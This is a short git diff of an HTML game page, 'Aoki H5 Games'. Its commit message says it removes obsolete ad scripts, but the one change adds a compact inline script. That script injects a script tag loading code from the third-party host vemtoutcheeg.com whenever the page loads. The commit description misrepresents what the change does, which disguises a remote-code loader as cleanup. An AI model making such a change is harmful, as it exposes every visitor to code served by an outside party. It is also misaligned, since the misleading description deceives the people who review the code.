refactor: remove obsolete ad scripts from html files

--- a/beauty/play.html
+++ b/beauty/play.html
@@ -9,6 +9,7 @@
   <link rel="shortcut icon" href="https://cdn.jsdelivr.net/gh/youngjuning/images@main/1742301937620.png" type="image/x-icon">
   <title>Aoki H5 Games</title>
   <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-7962287588031867" crossorigin="anonymous"></script>
+	<script>(function(d,z,s){s.src='https://'+d+'/400/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('vemtoutcheeg.com',9321962,document.createElement('script'))</script>
 </head>
 <body>
 	<div id="App" v-cloak>
